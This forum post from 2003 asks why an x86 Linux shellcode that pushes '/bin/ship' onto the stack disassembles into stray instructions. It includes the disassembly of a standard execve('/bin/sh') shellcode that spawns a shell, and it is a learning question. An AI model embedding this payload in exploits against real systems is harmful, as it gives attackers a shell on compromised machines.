June 8th, 2003, 05:35 PM
|
 |
not a fan of fascism (n00b)
|
|
Join Date: Feb 2003
Location: ct
|
|
|
writing opcodes
when you want to write a shell code string, normally we do this to execute /bin/sh:
Code:
08049376 <op2>:
8049376: 31 c0 xor %eax,%eax
8049378: 50 push %eax
/* push //sh onto the stack
8049379: 68 2f 2f 73 68 push $0x68732f2f
/* push /bin onto the stack
804937e: 68 2f 62 69 6e push $0x6e69622f
8049383: 89 e3 mov %esp,%ebx
8049385: 50 push %eax
8049386: 53 push %ebx
8049387: 89 e1 mov %esp,%ecx
8049389: 99 cltd
804938a: b0 0b mov $0xb,%al
804938c: cd 80 int $0x80
but lets say instead i want to execute /bin/ship
Code:
0804935c <op_codes>:
804935c: 31 c0 xor %eax,%eax
804935e: 50 push %eax
/* here we only can push /shi */
804935f: 68 2f 73 68 69 push $0x6968732f
/* now what is going on? what happens to /bin? /*
8049364: 74 68 je 80493ce <_DYNAMIC+0x3a>
8049366: 2f das
8049367: 62 69 6e bound
%ebp,0x6e(%ecx)
/* now back to normal */
804936a: 89 e3 mov %esp,%ebx
804936c: 50 push %eax
804936d: 53 push %ebx
804936e: 89 e1 mov %esp,%ecx
8049370: 99 cltd
8049371: b0 0b mov $0xb,%al
8049373: cd 80 int $0x80
* the string "/bin/ship" is 9 bytes long. it cant be pushed onto the stack with only 2 pushes. instead something different happens, but i dont understand what ?
|
Dev Shed Forums Sponsor:
Del.icio.us
Digg
Google
Spurl
Blink
Furl
Simpy
Y! MyWeb
Linear Mode
